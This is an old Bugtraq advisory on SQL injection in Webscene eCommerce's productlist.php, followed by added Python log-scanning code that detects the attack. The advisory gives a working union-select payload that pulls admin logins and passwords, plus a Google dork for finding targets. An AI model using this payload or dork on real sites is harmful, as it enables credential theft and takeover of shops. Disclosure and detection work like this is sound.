Date: 14 Oct 2008 16:29:29 -0000
From: angel@...ng.cc
To: bugtraq@...urityfocus.com
Subject: Webscene eCommerce (level) Remote Sql Injection

#################################################################################
#
#  Webscene eCommerce (level) Remote Sql Injection
#
#  vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
#################################################################################
#
#
#       Bug Found By :Angela Chang (14-10-2008)
#
#       contact: angel[at]ch4ng.cc
#
#
################################################################################
#
#
#      Greetz: nyubi & Vrs-Chk
#
#
###############################################################################

vuln file : productlist.php

Input passed to the "level" parameter is not properly verified
before being used. This can be exploited to perform
remote SQL injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
          http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

         
Google dork : inurl:productlist.php?categoryid= level

########################################################################
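
An added detection example (not part of the original advisory and not vendor code): the Python code below scans web access log lines for requests to productlist.php whose `categoryid` or `level` value is not a plain non-negative integer. The log lines are constructed samples, and the assumption that both parameters are numeric IDs is inferred from the advisory's URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_SCRIPT = "productlist.php"
# Assumption: both parameters are non-negative numeric IDs in normal use.
NUMERIC_PARAMS = ("categoryid", "level")
INT_RE = re.compile(r"[0-9]{1,10}")
# Request line of a common/combined log format entry; the target may contain
# raw spaces when a client sends the query string unencoded.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Oct/2008:16:01:02 +0000] "GET /productlist.php?categoryid=20&level=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Oct/2008:16:03:44 +0000] "GET /productlist.php?categoryid=20'
    '&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser-- HTTP/1.1" 200 731',
    '192.0.2.10 - - [14/Oct/2008:16:05:10 +0000] "GET /index.php?level=abc HTTP/1.1" 200 900',
    '198.51.100.7 - - [14/Oct/2008:16:06:00 +0000] "GET /shop/productlist.php?categoryid=20&level=3&level=3%27 HTTP/1.1" 500 0',
]


def suspicious_params(log_line):
    """Return {param: decoded_value} for non-integer values sent to the script."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/" + TARGET_SCRIPT):
        return {}  # other scripts are out of scope for this check
    query = parse_qs(url.query, keep_blank_values=True)
    hits = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):  # repeated parameters are all checked
            if not INT_RE.fullmatch(value):
                hits[name] = value
    return hits


def scan(lines):
    """Return [(line_number, hits)] for every flagged log line."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := suspicious_params(line))]


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Log review of this kind complements the fix in productlist.php itself: validating `level` as an integer and binding it as a query parameter instead of concatenating it into the SQL statement.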
                   __ _             _                              _                        __ _  
  __ _    _ _     / _` |   ___     | |    __ _      o O O   __    | |_     __ _    _ _     / _` | 
 / _` |  | ' \    \__, |  / -_)    | |   / _` |    o       / _|   | ' \   / _` |  | ' \    \__, | 
 \__,_|  |_||_|   |___/   \___|   _|_|_  \__,_|   TS__[O]  \__|_  |_||_|  \__,_|  |_||_|   |___/  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
